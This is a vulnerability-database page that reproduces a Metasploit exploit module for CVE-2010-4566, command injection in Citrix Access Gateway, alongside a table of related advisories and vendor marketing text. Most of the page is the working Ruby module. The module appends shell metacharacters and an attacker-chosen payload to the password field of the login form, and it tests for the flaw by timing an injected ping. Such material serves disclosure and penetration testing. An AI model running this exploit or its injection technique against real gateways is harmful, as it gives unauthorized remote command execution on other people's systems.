Lucene search
K

Citrix Access Gateway Command Execution

🗓️ 03 Mar 2011 20:51:12Reported by George D. Gal, Erwin PaternotteType 
metasploit
 metasploit
🔗 www.rapid7.com👁 38 Views

Citrix Access Gateway Command Execution vulnerability in the Samba 'samedit' utility provides support for multiple authentication types, leading to arbitrary command execution

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-4566
22 Dec 201000:00
circl
CVE
CVE-2010-4566
14 Jan 201122:00
cve
Cvelist
CVE-2010-4566
14 Jan 201122:00
cvelist
Exploit DB
Citrix Access Gateway - Command Injection
22 Dec 201000:00
exploitdb
Exploit DB
Citrix Access Gateway - Command Execution (Metasploit)
3 Mar 201100:00
exploitdb
exploitpack
Citrix Access Gateway - Command Injection
22 Dec 201000:00
exploitpack
NVD
CVE-2010-4566
14 Jan 201123:00
nvd
Packet Storm
Citrix Access Gateway Command Injection
21 Dec 201000:00
packetstorm
Packet Storm
Citrix Access Gateway Command Execution
4 Mar 201100:00
packetstorm
Prion
Authentication flaw
14 Jan 201123:00
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Citrix Access Gateway Command Execution',
      'Description'    => %q{
          The Citrix Access Gateway provides support for multiple authentication types.
        When utilizing the external legacy NTLM authentication module known as
        ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
        line utility to verify a user's identity and password.  By embedding shell
        metacharacters in the web authentication form it is possible to execute
        arbitrary commands on the Access Gateway.
      },
      'Author'         =>
        [
          'George D. Gal', # Original advisory
          'Erwin Paternotte', # Exploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-4566' ],
          [ 'OSVDB', '70099' ],
          [ 'BID', '45402' ],
          [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 127,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              #'RequiredCmd' => 'generic telnet bash-tcp'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 30
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2010-12-21',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
      ])

  end

  def post(command, background)
    username = rand_text_alphanumeric(20)

    if background
      sploit = Rex::Text.uri_encode('|' + command + '&')
    else
      sploit = Rex::Text.uri_encode('|' + command)
    end

    data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
    data << username
    data << "&password="
    data << sploit

    res = send_request_cgi({
      'uri'     => '/',
      'method'  => 'POST',
      'data'    => data
    }, 25)
  end

  def check
    print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

    # Try running/timing 'ping localhost' to determine is system is vulnerable
    start = Time.now
    post("ping -c 10 127.0.0.1", false)
    elapsed = Time.now - start
    if elapsed >= 3
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    cmd = payload.encoded

    if not post(cmd, true)
      fail_with(Failure::Unknown, "Unable to execute the desired command")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation